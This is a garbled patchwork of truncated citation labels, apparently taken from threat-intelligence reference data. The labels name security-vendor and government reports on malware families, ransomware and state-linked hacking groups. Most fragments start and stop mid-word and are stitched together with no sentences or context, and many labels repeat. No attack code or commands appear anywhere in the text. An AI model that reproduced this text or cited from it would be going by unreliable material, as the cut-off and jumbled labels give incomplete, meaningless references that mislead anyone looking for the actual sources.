on: ESET Casbaneiro Oct 2019),(Citation: Rapid7 HAFNIUM Mar 2021),(Citation: CISA AR18-352A Quasar RAT December 2018),(Citation: Pr

ye admin@338),(Citation: ESET GreyEnergy Oct 2018),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citation: Kaspersky Turla),

tinelLabs Metador Technical Appendix Sept 2022),(Citation: NCC Group APT15 Alive and Strong),(Citation: Github Koadic),(Citation: Crowds

1.v2 TAIDOOR August 2021),(Citation: Kaspersky QakBot September 2021),(Citation: CISA AA24-038A PRC Critical Infrastructure February
parent Tribe May 2021),(Citation: Secure List Bad Rabbit),(Citation: Unit 42 TA551 Jan 2021),(Citation: Kaspersky WIRTE November 2021),(

redcurl2),(Citation: Proofpoint TA505 Jan 2019),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Trend Micro Muddy Water March 2
PT29 Microsoft 365 2022),(Citation: Symantec Suckfly May 2016),(Citation: Symantec Cicada November 2020),(Citation: Microsoft POLONIU

n: Unit42 OceanLotus 2017),(Citation: Microsoft DUBNIUM June 2016),(Citation: Cyphort EvilBunny Dec 2014),(Citation: Bitsight Latrodect

1),(Citation: LogRhythm WannaCry),(Citation: TrendMicro RaspberryRobin 2022),(Citation: Github PowerShell Empire),(Citation: Alperovit
mber 2017),(Citation: FireEye APT34 Dec 2017),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: group-ib_red

Oct 2016),(Citation: PWC Yellow Liderc 2023),(Citation: McAfee Dianxun March 2021),(Citation: Phish Labs Silent Librarian),(Citation: Malw
ron Tiger Linux),(Citation: fsecure NanHaiShu July 2016),(Citation: FireEye APT41 Aug 2019),(Citation: NCSC APT29 July 2020),(Citation: Fir

s Oct 2018),(Citation: Microsoft GALLIUM December 2019),(Citation: Malwarebytes Pony April 2016),(Citation: Trend Micro njRAT 2018),(C

endMicro EarthLusca 2022),(Citation: GitHub Pupy),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: Unit 42

a Raccoon1 2022),(Citation: ESET InvisiMole June 2018),(Citation: McAfee Bankshot),(Citation: Palo Alto Comnie),

m),(Citation: FireEye APT41 Aug 2019),(Citation: IBM IcedID November 2017),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: ES
n: Cyber Forensicator Silence Jan 2019),(Citation: Cybereason Chaes Nov 2020),(Citation: Sophos Gootloader),(Citation: Unit42 Xbash Sept

APT29),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Microsoft Volt Typhoon May 2023),(Citation: Kaspersky WIRTE Nov

tation: Secureworks BRONZE BUTLER Oct 2017),(Citation: NTT Security Flagpro new December 2021),(Citation: Talos Bisonal Mar 2020),(C
18),(Citation: Novetta Blockbuster Destructive Malware),(Citation: Medium KONNI Jan 2020),(Citation: Talos Cobalt Group July 2018),(Citati
7),(Citation: SANS Conficker),(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Sophos Ragnar May 2020),(Citation: Trend Micro

r 2021),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Symantec MuddyWater Dec 2018),(Citation: ESET Security Mis

2018),(Citation: Trend Micro Muddy Water March 2021),(Citation: GitHub Sliver HTTP),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Ci
ation: ClearkSky Fox Kitten February 2020),(Citation: Unit 42 Shamoon3 2018),(Citation: trendmicro xcsset xcode project 2020),(Citation: m

SecureWorks BRONZE UNION June 2017),(Citation: Eset Ramsay May 2020),(Citation: Talos Oblique RAT March 2021),(Citation: FoxIT Woc

door November 2020),(Citation: Mandiant Operation Ke3chang November 2014),(Citation: Cybereason Bumblebee August 2022),(Citation:
Citation: ESET LightNeuron May 2019),(Citation: Bitdefender FunnyDream Campaign November 2020),(Citation: Morphisec ShellTea June 2

ation: ESET Buhtrap and Buran April 2019),(Citation: CISA AA21-200A APT40 July 2021),(Citation: Dell TG-3390),(Citation: Unit 42 C0d0so0

ComRAT Oct 2020),(Citation: Securelist APT10 March 2021),(Citation: GitHub Pupy),(Citation: NCSC-NL COATHANGER Feb 2024),(Citation: g
A Snake Malware May 2023),(Citation: US-CERT BADCALL),(Citation: US-CERT BLINDINGCAN Aug 2020),(Citation: Secureworks BRONZE BUT
41 2024),(Citation: FireEye APT10 Sept 2018),(Citation: CitizenLab KeyBoy Nov 2016),(Citation: Talent-Jump Clambling February 2020),(Cita
r March 2021),(Citation: Dragos EKANS),(Citation: NCC Group Team9 June 2020),(Citation: Talos ZxShell Oct 2014),(Citation: FireEye KEGTA

Jun 2019),(Citation: FireEye Hacking Team),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: TrendMicro Tro

los Jan 2021),(Citation: ClearSky Wilted Tulip July 2017),

2019),(Citation: PTSecurity Cobalt Dec 2016),(Citation: Red Canary SocGholish March 2024),(Citation: Chronicle Winnti for Linux May 2019
itation: Crowdstrike DriveSlayer February 2022),(Citation: Check Point Meteor Aug 2021),(Citation: Tetra Defense Sodinokibi March 2020),

ISA Operation Muzabi),(Citation: Novetta Blockbuster),(Citation: TrendMicro Tonto Team October 2020),(Citation: Cobalt Strike Manual 4.
n: Unit42 Redaman January 2019),(Citation: Google TAG COLDRIVER January 2024),(Citation: MoustachedBouncer ESET August 2023),(Cita
y 2021),(Citation: CERT-FR PYSA April 2020),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: ESET Gelsemiu

3),(Citation: SentinelOne Valak June 2020),(Citation: Fidelis njRAT June 2013),(Citation: US-CERT BADCALL),(Citation: Prevailion DarkWatch

021),(Citation: Microsoft Actinium February 2022),(Citation: ESET Gelsemium June 2021),(Citation: Github PowerShell Empire),(Citation: ES

June 2020),(Citation: Cado Security TeamTNT Worm August 2020),(Citation: SecTools nbtscan June 2003),(Citation: Crowdstrike TELCO BPO
C Group Fivehands June 2021),(Citation: FireEye APT41 Aug 2019),(Citation: Bitsight Latrodectus June 2024),(Citation: Antiy CERT Ramsay A

CISA MAR-10292089-1.v2 TAIDOOR August 2021),(Citation: Kaspersky QakBot September 2021),(Citation: NCSC-NL COATHANGER Feb 202

ntec MuddyWater Dec 2018),(Citation: RedCanary Mockingbird May 2020),(Citation: FoxIT Wocao December 2019),(Citation: TrendMicro E

tation: iSight Sandworm Oct 2014),(Citation: Unit 42 Kazuar May 2017),(Citation: Trend Micro Daserf Nov 2017),(Citation: FireEye Fin8 Ma

Dec 2016),(Citation: GitHub Invoke-Obfuscation),(Citation: Talos Cobalt Group July 2018),(Citation: Unit 42 BackConfig May 2020),(Citation

2021),(Citation: Talos Promethium June 2020),(Citation: Securelist WhiteBear Aug 2017),(Citation: Bromium Ursnif Mar 2017),(Citation: Ci

SET Dukes October 2019),(Citation: McAfee Night Dragon),(Citation: Elastic Latrodectus May 2024),(Citation: Unit 42 SeaDuke 2015),(Citati

nder LuminousMoth July 2021),(Citation: Palo Alto Sofacy 06-2018),(Citation: SOCRadar INC Ransom January 2024),(Citation: Mandiant APT
Citation: Unit 42 TA551 Jan 2021),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: Kaspersky WIRTE November 2021),(Citation:
osoft Unidentified Dec 2018),(Citation: TrendMicro Confucius APT Aug 2021),(Citation: Symantec Elderwood Sept 2012),(Citation: Securew

oddyCat June 2022),(Citation: Mandiant Cutting Edge January 2024),(Citation: Talos GravityRAT),(Citation: Imminent Unit42 Dec2019),(Cita
itation: NCSC-NL COATHANGER Feb 2024),(Citation: Fortinet Remcos Feb 2017),(Citation: Unit 42 IronNetInjector February 2021 ),(Citatio

ebee June 2022),(Citation: Symantec W32.Duqu),(Citation: Accenture Dragonfish Jan 2018),(Citation: Trend Micro Banking Malware Jan 20

ye APT41 Aug 2019),(Citation: ESET Turla PowerShell May 2019),(Citation: Kaspersky Adwind Feb 2016),(Citation: Microsoft Volt Typhoon

o DRBControl February 2020),(Citation: Talos Group123),(Citation: GitHub PowerSploit May 2012),(Citation: ESET OceanLotus Mar 2019),(
atchwork),(Citation: DFIR Report APT35 ProxyShell March 2022),(Citation: Kaspersky Adwind Feb 2016),(Citation: CrowdStrike Grim Spider
Ryuk 2 Hour Speed Run November 2020),(Citation: Dragos Crashoverride 2018),(Citation: Kaspersky Turla),(Citation: US-CERT NotPetya 20

CH Mar 2021),(Citation: Symantec WastedLocker June 2020),(Citation: TechNet Arp),(Citation: RATANKBA),(Citation: FireEye KEGTAP SING

on: Red Canary Qbot),(Citation: Cyberint Qakbot May 2021),(Citation: Mandiant FIN12 Oct 2021),(Citation: Microsoft Actinium February 20

R Oct 2017),(Citation: Sekoia Raccoon2 2022),(Citation: KISA Operation Muzabi),(Citation: FireEye CARBANAK June 2017),(Citation: Cobalt
0A APT40 July 2021),(Citation: Dell TG-3390),(Citation: NSA and ASD Detect and Prevent Web Shells 2020),(Citation: ITSyndicate Disabling

b 2020),(Citation: TrendMicro TropicTrooper 2015),(Citation: DFIR_Sodinokibi_Ransomware),(Citation: FireEye APT28),(Citation: Cybereaso

22),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Microsoft GALLIUM December 2019),(Citation: ESET Ga
(Citation: Crowdstrike HuntReport 2022),(Citation: Palo Alto Sofacy 06-2018),(Citation: F-Secure Sofacy 2015),(Citation: Deep Instinct TA50

cao December 2019),(Citation: McAfee Gold Dragon),(Citation: ESET LoudMiner June 2019),(Citation: FireEye FELIXROOT July 2018),(Citatio

n: ESET Industroyer),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Mandiant APT41),(Citation: NCC Group Chimera January 2021

n: RATANKBA),(Citation: Avira Mustang Panda January 2020),(Citation: Kaspersky Lyceum October 2021),(Citation: PWC Cloud Hopper Tec
T December 2018),(Citation: Proofpoint TA505 October 2019),(Citation: Debian nbtscan Nov 2019),(Citation: BlackBerry Amadey 2020),(Cit

Citation: Kaspersky Turla),

thub Koadic),(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Sophos Ragnar May 2020),(Citation: Palo Alto Shamoon Nov 2016

ritical Infrastructure February 2024),(Citation: TrendMicro POWERSTATS V3 June 2019),(Citation: Cyphort EvilBunny Dec 2014),(Citation: F
rsky WIRTE November 2021),(Citation: Cylance Shaheen Nov 2018),(Citation: Talos Promethium June 2020),(Citation: McAfee Honeybee),

d Micro Muddy Water March 2021),(Citation: Unit 42 Cobalt Gang Oct 2018),(Citation: TrendMicro Confucius APT Aug 2021),(Citation: Sym
0),(Citation: Microsoft POLONIUM June 2022),(Citation: RSA2017 Detect and Respond Adair),(Citation: FireEye Hacking FIN4 Video Dec 201

4),(Citation: Bitsight Latrodectus June 2024),(Citation: FireEye SUNSHUTTLE Mar 2021),(Citation: Talos PoetRAT April 2020),(Citation: PaloA

ell Empire),(Citation: Alperovitch 2014),(Citation: SentinelOne Valak June 2020),(Citation: Kaspersky ToddyCat Check Logs October 2023),(C
y 2011),(Citation: group-ib_redcurl2),(Citation: group-ib_redcurl1),(Citation: McAfee Bankshot),(Citation: GitHub SILENTTRINITY Modules J

ilent Librarian),(Citation: Malwarebytes Silent Librarian October 2020),(Citation: Lunghi Iron Tiger Linux),(Citation: FireEye SUNSHUTTLE M
APT29 July 2020),(Citation: FireEye APT34 Dec 2017),(Citation: NCC Group APT15 Alive and Strong),(Citation: TrendMicro Tropic Trooper M

n: Trend Micro njRAT 2018),(Citation: Unit42 Redaman January 2019),(Citation: FireEye Hacking FIN4 Video Dec 2014),(Citation: Kaspersky

bruary 2024),(Citation: Unit 42 OopsIE! Feb 2018),(Citation: objsee mac malware 2017),(Citation: Cycraft Chimera April 2020),(Citation: Fir

ooper May 2020),(Citation: ESET Gazer Aug 2017),(Citation: Talos Promethium June 2020),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: S
r),(Citation: Unit42 Xbash Sept 2018),(Citation: DFIR Conti Bazar Nov 2021),(Citation: Cylance Dust Storm),(Citation: Latrodectus APR 2024)

Citation: Kaspersky WIRTE November 2021),(Citation: Talos Promethium June 2020),(Citation: Bromium Ursnif Mar 2017),(Citation: Volexit

on: Talos Bisonal Mar 2020),(Citation: Talos PoetRAT October 2020),(Citation: PTSecurity Higaisa 2020),(Citation: Telefonica Snip3 Decemb
Cobalt Group July 2018),(Citation: TrendMicro Cobalt Group Nov 2017),(Citation: ESET LightNeuron May 2019),(Citation: Dell TG-1314),(Ci
y 2020),(Citation: Trend Micro Trickbot Nov 2018),(Citation: Bitdefender Naikon April 2021),(Citation: GitHub SILENTTRINITY Modules July

8),(Citation: ESET Security Mispadu Facebook Ads 2019),(Citation: Kaspersky QakBot September 2021),(Citation: GitHub Pupy),(Citation: D

arus Resurfaces Feb 2018),(Citation: Kaspersky Lyceum October 2021),(Citation: Unit42 BabyShark Feb 2019),(Citation: Bitdefender Sardo
ode project 2020),(Citation: mbed-crypto),(Citation: Cybereason Clop Dec 2020),(Citation: Microsoft Prestige ransomware October 2022),

rch 2021),(Citation: FoxIT Wocao December 2019),(Citation: Cisco Talos Intelligence Group),(Citation: McAfee Gold Dragon),(Citation: ESET

blebee August 2022),(Citation: BlackBerry Amadey 2020),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: ESET EvasivePa
on: Morphisec ShellTea June 2019),(Citation: Unit 42 VERMIN Jan 2018),(Citation: FBI FLASH APT39 September 2020),(Citation: Kaspersky

90),(Citation: Unit 42 C0d0so0 Jan 2016),(Citation: Windows Blogs Microsoft Edge Sandbox),(Citation: Ars Technica Pwn2Own 2017 VM Esc

HANGER Feb 2024),(Citation: group-ib_redcurl1),(Citation: ESET GreyEnergy Oct 2018),(Citation: DHS CISA AA22-055A MuddyWater Febru
tion: Secureworks BRONZE BUTLER Oct 2017),(Citation: FireEye CARBANAK June 2017),(Citation: Talos Bisonal Mar 2020),(Citation: Novetta
Clambling February 2020),(Citation: Trend Micro Waterbear December 2019),(Citation: Anomali MUSTANG PANDA October 2019),(Citation
2014),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Cybereason Clop Dec 2020),(Citation: PWC Cloud Hopper Technical

011),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: TrendMicro Lazarus Nov 2018),(Citation: Kaspersky WIRTE November 2021

cle Winnti for Linux May 2019),(Citation: ESET Dukes October 2019),(Citation: Sygnia Emperor Dragonfly October 2022),(Citation: ESET Tur
fense Sodinokibi March 2020),(Citation: TrendMicro Netwalker May 2020),(Citation: Mandiant ROADSWEEP August 2022),(Citation: Check

ation: Cobalt Strike Manual 4.3 November 2020),(Citation: Securelist Machete Aug 2014),(Citation: Malwarebytes Kimsuky June 2021),(Cit
uncer ESET August 2023),(Citation: Trend Micro Black Basta May 2022),(Citation: Volexity SolarWinds),(Citation: QiAnXin APT-C-36 Feb201
2020),(Citation: ESET Gelsemium June 2021),(Citation: ESET PipeMon May 2020),(Citation: Microsoft Analyzing Solorigate Dec 2020),(Citati

itation: Prevailion DarkWatchman 2021),(Citation: Uptycs Warzone UAC Bypass November 2020),(Citation: Arxiv Avaddon Feb 2021),(Cita

werShell Empire),(Citation: ESET PipeMon May 2020),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citation: Joint Cyber

tation: Crowdstrike TELCO BPO Campaign December 2022),(Citation: Group IB Cobalt Aug 2017),(Citation: FireEye Periscope March 2018),
(Citation: Antiy CERT Ramsay April 2020),(Citation: Crowdstrike Indrik November 2018),(Citation: Cybereason INC Ransomware November

CSC-NL COATHANGER Feb 2024),(Citation: Scarlet Mimic Jan 2016),(Citation: Cadet Blizzard emerges as novel threat actor),(Citation: Senti

r 2019),(Citation: TrendMicro EarthLusca 2022),(Citation: GitHub Pupy),(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015

017),(Citation: FireEye Fin8 May 2016),(Citation: NTT Security Flagpro new December 2021),(Citation: Arxiv Avaddon Feb 2021),(Citation: F

ackConfig May 2020),(Citation: Trend Micro Black Basta October 2022),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: M

Ursnif Mar 2017),(Citation: Citizen Lab Group5),(Citation: McAfee Honeybee),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: ESET

Unit 42 SeaDuke 2015),(Citation: Unit 42 Rocke January 2019),(Citation: Securelist APT10 March 2021),(Citation: Lookout Dark Caracal Jan

2024),(Citation: Mandiant APT1),(Citation: PTSecurity Cobalt Dec 2016),(Citation: Microsoft Unidentified Dec 2018),(Citation: FireEye KEGT
TE November 2021),(Citation: Google_WinRAR_vuln_2023),(Citation: Cylance Shaheen Nov 2018),(Citation: Security Affairs DustSquad Oct
Sept 2012),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: ESET Turla Mosquito Jan 2018),(Citation: McAfee Night

mminent Unit42 Dec2019),(Citation: Symantec Linfo May 2012),(Citation: SentinelOne Agrius 2021),(Citation: US-CERT KEYMARBLE Aug 201
ector February 2021 ),(Citation: ESET InvisiMole June 2020),(Citation: Malwarebytes Dyreza November 2015),(Citation: Donut Github),(Cit

Micro Banking Malware Jan 2019),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citation: Github Koadic),(Citation:

tion: Microsoft Volt Typhoon May 2023),(Citation: TrendMicro Lazarus Nov 2018),(Citation: CheckPoint Naikon May 2020),(Citation: Proof

ESET OceanLotus Mar 2019),(Citation: NCC Group Team9 June 2020),(Citation: RATANKBA),(Citation: Talos ZxShell Oct 2014),(Citation: Mc
tion: CrowdStrike Grim Spider May 2019),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: FireEye APT34 Webinar Dec 20
Citation: US-CERT NotPetya 2017),(Citation: Crowdstrike HuntReport 2022),(Citation: Microsoft Preventing SMB)

Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Kaspersky Lyceum October 2021),(Citation: PWC Cloud Hopper Technical A

Microsoft Actinium February 2022),(Citation: Github PowerShell Empire),(Citation: SentinelOne Valak June 2020),(Citation: Crowdstrike Qak

K June 2017),(Citation: Cobalt Strike Manual 4.3 November 2020),(Citation: Securelist Machete Aug 2014),(Citation: Malwarebytes Kimsuk
Citation: ITSyndicate Disabling PHP functions)

ye APT28),(Citation: Cybereason Clop Dec 2020),(Citation: Palo Alto Brute Ratel July 2022),(Citation: Kaspersky TajMahal April 2019),(Citati

mber 2019),(Citation: ESET Gazer Aug 2017),(Citation: Crowdstrike DriveSlayer February 2022),(Citation: Mandiant ROADSWEEP August 20
5),(Citation: Deep Instinct TA505 Apr 2019),(Citation: Talos ZxShell Oct 2014),(Citation: ESET Dukes October 2019),(Citation: ESET Turla Mo

e FELIXROOT July 2018),(Citation: ESET Security Mispadu Facebook Ads 2019),(Citation: Cisco Talos Transparent Tribe Education Campaign

C Group Chimera January 2021),(Citation: Securelist BlackEnergy Nov 2014),(Citation: Cybereason Soft Cell June 2019),(Citation: ESET Mac

ation: PWC Cloud Hopper Technical Annex April 2017),(Citation: Kaspersky ProjectSauron Technical Analysis),(Citation: Malwarebytes Kon
BlackBerry Amadey 2020),(Citation: Secureworks BRONZE SILHOUETTE May 2023),(Citation: ESET Zebrocy Nov 2018),(Citation: DigiTrust A

n: Palo Alto Shamoon Nov 2016),(Citation: Gh0stRAT ATT March 2019),(Citation: ESET InvisiMole June 2020),(Citation: Trellix Darkgate 202

ilBunny Dec 2014),(Citation: FireEye SUNSHUTTLE Mar 2021),(Citation: CISA MAR-10288834-2.v1 TAINTEDSCRIBE MAY 2020),(Citation: Pa
(Citation: McAfee Honeybee),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Bitdefen

APT Aug 2021),(Citation: Symantec Elderwood Sept 2012),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: ESET Tu
e Hacking FIN4 Video Dec 2014),(Citation: CISA Star Blizzard Advisory December 2023),(Citation: Accenture MUDCARP March 2019),(Citati

RAT April 2020),(Citation: PaloAlto UBoatRAT Nov 2017),(Citation: Microsoft Volt Typhoon May 2023),(Citation: Kaspersky WIRTE Novembe

at Check Logs October 2023),(Citation: DHS/CISA Ransomware Targeting Healthcare October 2020),(Citation: Hornet Security Avaddon Jun
Hub SILENTTRINITY Modules July 2019),(Citation: UCF STIG Elevation Account Enumeration)

ation: FireEye SUNSHUTTLE Mar 2021),(Citation: CISA AA20-296A Berserk Bear December 2020),(Citation: Proofpoint Operation Transpare
TrendMicro Tropic Trooper May 2020),(Citation: FireEye FiveHands April 2021),(Citation: CYBERCOM Iranian Intel Cyber January 2022),(C

Dec 2014),(Citation: Kaspersky Cloud Atlas August 2019),(Citation: Microsoft Moonstone Sleet 2024),(Citation: Gigamon BADHATCH Jul 20

mera April 2020),(Citation: FireEye APT39 Jan 2019),(Citation: Microsoft GALLIUM December 2019),(Citation: Secureworks GOLD SAHARA)

C0d0so0 Jan 2016),(Citation: Securelist WhiteBear Aug 2017),(Citation: Palo Alto Comnie),(Citation: TrendMicro Pawn Storm Dec 2020),(C
tation: Latrodectus APR 2024),(Citation: SecureList Griffon May 2019),(Citation: fsecure NanHaiShu July 2016),(Citation: Bitsight Latrodect

if Mar 2017),(Citation: Volexity Exchange Marauder March 2021),(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: Netskope Squirre

tion: Telefonica Snip3 December 2021),(Citation: MalwareBytes LazyScripter Feb 2021),(Citation: Talos Cobalt Strike September 2020),(Cita
19),(Citation: Dell TG-1314),(Citation: Symantec Shuckworm January 2022),(Citation: Palo Alto DNS Requests),(Citation: Bitdefender Funny
b SILENTTRINITY Modules July 2019),(Citation: ClearSky Wilted Tulip July 2017),(Citation: CISA MAR SLOTHFULMEDIA October 2020),(Citati

tion: GitHub Pupy),(Citation: Directory Services Internals DPAPI Backup Keys Oct 2015),(Citation: CISA AA24-038A PRC Critical Infrastructur

9),(Citation: Bitdefender Sardonic Aug 2021),(Citation: Elastic Latrodectus May 2024),(Citation: Volexity Ivanti Zero-Day Exploitation Januar
e ransomware October 2022),(Citation: Symantec FIN8 Jul 2023),(Citation: Sygnia Emperor Dragonfly October 2022),(Citation: Kaspersky S

e Gold Dragon),(Citation: ESET TeleBots Oct 2018),(Citation: ESET Sednit USBStealer 2014),(Citation: Securelist Dtrack),(Citation: US-CERT

023),(Citation: ESET EvasivePanda 2023),(Citation: Red Canary Qbot),(Citation: Cobalt Strike TTPs Dec 2017),(Citation: Mandiant FIN12 Oct
ber 2020),(Citation: Kaspersky ToddyCat June 2022),(Citation: Mandiant Cutting Edge January 2024),(Citation: SecureWorks August 2019),(

chnica Pwn2Own 2017 VM Escape),(Citation: TechNet Moving Beyond EMET),(Citation: Wikipedia Control Flow Integrity)

A22-055A MuddyWater February 2022),(Citation: FireEye MuddyWater Mar 2018),(Citation: CISA Zebrocy Oct 2020),(Citation: Google Clou
l Mar 2020),(Citation: Novetta Blockbuster),(Citation: BlackBerry CostaRicto November 2020),(Citation: Unit 42 Lucifer June 2020),(Citatio
ANDA October 2019),(Citation: Palo Alto Networks BBSRAT),(Citation: Cybereason OperationCuckooBees May 2022),(Citation: Bitdefende
PWC Cloud Hopper Technical Annex April 2017),(Citation: McAfee Night Dragon),(Citation: Ensilo Darkgate 2018),(Citation: Volexity Ivanti

persky WIRTE November 2021),(Citation: ESET Gazer Aug 2017),(Citation: CISA EB Aug 2020),(Citation: Huntress INC Ransomware May 20

tober 2022),(Citation: ESET Turla Mosquito Jan 2018),(Citation: PWC Cloud Hopper Technical Annex April 2017),(Citation: McAfee Night Dr
August 2022),(Citation: Check Point Black Basta October 2022),(Citation: ESET InvisiMole June 2018),(Citation: Qualys Hermetic Wiper Ma

ebytes Kimsuky June 2021),(Citation: McAfee Cuba April 2021),(Citation: Microsoft SIR Vol 19),(Citation: Symantec Remsec IOCs),(Citation:
tion: QiAnXin APT-C-36 Feb2019),(Citation: Bitdefender StrongPity June 2020),(Citation: Objective See Green Lambert for OSX Oct 2021),(C
ng Solorigate Dec 2020),(Citation: Leonardo Turla Penquin May 2020),(Citation: Mandiant Suspected Turla Campaign February 2023),(Citati

Arxiv Avaddon Feb 2021),(Citation: KISA Operation Muzabi),(Citation: Talos Bisonal Mar 2020),(Citation: Microsoft BlackCat Jun 2022),(Cita

ry 2023),(Citation: Joint Cybersecurity Advisory AA23-129A Snake Malware May 2023),(Citation: Kaspersky ToddyCat Check Logs October

reEye Periscope March 2018),(Citation: CISA GRU29155 2024),(Citation: BitDefender Chafer May 2020),(Citation: trendmicro_redcurl),(Cit
n INC Ransomware November 2023),(Citation: Github Koadic),(Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011),(Citatio

el threat actor),(Citation: SentinelLabs Metador Technical Appendix Sept 2022),(Citation: Trend Micro FIN6 October 2019),(Citation: Check

s DPAPI Backup Keys Oct 2015),(Citation: CISA AA24-038A PRC Critical Infrastructure February 2024),(Citation: Cadet Blizzard emerges as n

Avaddon Feb 2021),(Citation: FireEye CARBANAK June 2017),(Citation: BlackBerry CostaRicto November 2020),(Citation: Cobalt Strike Manu

kooBees May 2022),(Citation: Morphisec Cobalt Gang Oct 2018),(Citation: Symantec Leafminer July 2018),(Citation: Rewterz Sidewinder AP

affle Oct 2021),(Citation: ESET Turla Lunar toolset May 2024),(Citation: Mandiant APT41),(Citation: Symantec Security Center Trojan.Kwam

tion: Lookout Dark Caracal Jan 2018),(Citation: NCSC-NL COATHANGER Feb 2024),(Citation: SentinelOne Aoqin Dragon June 2022),(Citatio

c 2018),(Citation: FireEye KEGTAP SINGLEMALT October 2020),(Citation: Kaspersky Lyceum October 2021),(Citation: NCC Group LAPSUS Ap
Security Affairs DustSquad Oct 2018),(Citation: TrendMicro Pawn Storm Dec 2020),(Citation: Netskope Squirrelwaffle Oct 2021),(Citation: B
2018),(Citation: McAfee Night Dragon),(Citation: MSTIC NOBELIUM May 2021),(Citation: Unit 42 NETWIRE April 2020),(Citation: AADIntern

US-CERT KEYMARBLE Aug 2018),(Citation: Accenture Dragonfish Jan 2018),(Citation: McAfee Bankshot),(Citation: Talos NavRAT May 2018
),(Citation: Donut Github),(Citation: Gigamon BADHATCH Jul 2019),(Citation: Google Cloud APT41 2024),(Citation: Bishop Fox Sliver Frame

tion: Github Koadic),(Citation: TrendMicro Tropic Trooper May 2020),(Citation: CheckPoint Naikon May 2020),(Citation: ESET Carberp Mar

on May 2020),(Citation: ProofPoint Ursnif Aug 2016),(Citation: ESET Windigo Mar 2014),(Citation: Microsoft POLONIUM June 2022),(Citati

ZxShell Oct 2014),(Citation: McAfee Lazarus Resurfaces Feb 2018),(Citation: ESET Dukes October 2019),(Citation: US-CERT Volgmer 2 Nov 2
FireEye APT34 Webinar Dec 2017),(Citation: Proofpoint TA505 Jan 2019),(Citation: Huntress INC Ransomware May 2024),(Citation: PWC C

PWC Cloud Hopper Technical Annex April 2017),(Citation: Secureworks GOLD KINGSWOOD September 2018),(Citation: Kaspersky ProjectSa

020),(Citation: Crowdstrike Qakbot October 2020),(Citation: Kaspersky ToddyCat Check Logs October 2023),(Citation: DHS/CISA Ransomwa

itation: Malwarebytes Kimsuky June 2021),(Citation: ESET BackdoorDiplomacy Jun 2021),(Citation: ESET Zebrocy May 2019),(Citation: Mal
ky TajMahal April 2019),(Citation: ESET Dukes October 2019),(Citation: ESET Turla Mosquito Jan 2018),(Citation: Secureworks GOLD KINGS

ndiant ROADSWEEP August 2022),(Citation: DFIR Ryuk 2 Hour Speed Run November 2020),(Citation: Qualys Hermetic Wiper March 2022),
2019),(Citation: ESET Turla Mosquito Jan 2018),(Citation: Malwarebytes Konni Aug 2021),(Citation: Talos Seduploader Oct 2017),(Citation:

ent Tribe Education Campaign July 2022),(Citation: Securelist Octopus Oct 2018),(Citation: ClearSky Lebanese Cedar Jan 2021),(Citation: M

une 2019),(Citation: ESET Machete July 2019),(Citation: ESET ComRAT May 2020),(Citation: Secureworks Gold Prelude Profile),(Citation: ZS

),(Citation: Malwarebytes Konni Aug 2021),(Citation: Bitdefender Sardonic Aug 2021),(Citation: SecureWorks BRONZE UNION June 2017),(
Nov 2018),(Citation: DigiTrust Agent Tesla Jan 2017),(Citation: US District Court Indictment GRU Unit 74455 October 2020),(Citation: ESET G

(Citation: Trellix Darkgate 2023),(Citation: Talos Promethium June 2020),(Citation: Qualys Hermetic Wiper March 2022),(Citation: CISA MA

CRIBE MAY 2020),(Citation: Palo Alto Shamoon Nov 2016),(Citation: ESET InvisiMole June 2020),(Citation: ESET GreyEnergy Oct 2018),(Cita
t May 2024),(Citation: Bitdefender Agent Tesla April 2020),(Citation: Trend Micro Qakbot May 2020),(Citation: Proofpoint TA459 April 201

mber 2018),(Citation: ESET Turla Mosquito Jan 2018),(Citation: Rewterz Sidewinder COVID-19 June 2020),(Citation: McAfee Night Dragon)
MUDCARP March 2019),(Citation: Huntress INC Ransom Group August 2023),(Citation: CISA Play Ransomware Advisory December 2023),(C

on: Kaspersky WIRTE November 2021),(Citation: Elastic Pikabot 2024),(Citation: NCCGroup RokRat Nov 2018),(Citation: Kaspersky Lab SynA

Hornet Security Avaddon June 2020),(Citation: Unit 42 Kazuar May 2017),(Citation: Prevailion DarkWatchman 2021),(Citation: ESET Herm
roofpoint Operation Transparent Tribe March 2016),(Citation: Talos Transparent Tribe May 2021),(Citation: FireEye APT29 Nov 2018),(Cita
n Intel Cyber January 2022),(Citation: FireEye APT34 Webinar Dec 2017),(Citation: ESET InvisiMole June 2020),(Citation: FireEye SUNBURST

n: Gigamon BADHATCH Jul 2019),(Citation: FireEye APT10 Sept 2018),(Citation: Bishop Fox Sliver Framework August 2019),(Citation: Medi

: Secureworks GOLD SAHARA),(Citation: Symantec Cicada November 2020),(Citation: Symantec Elfin Mar 2019),(Citation: Kaspersky Cloud

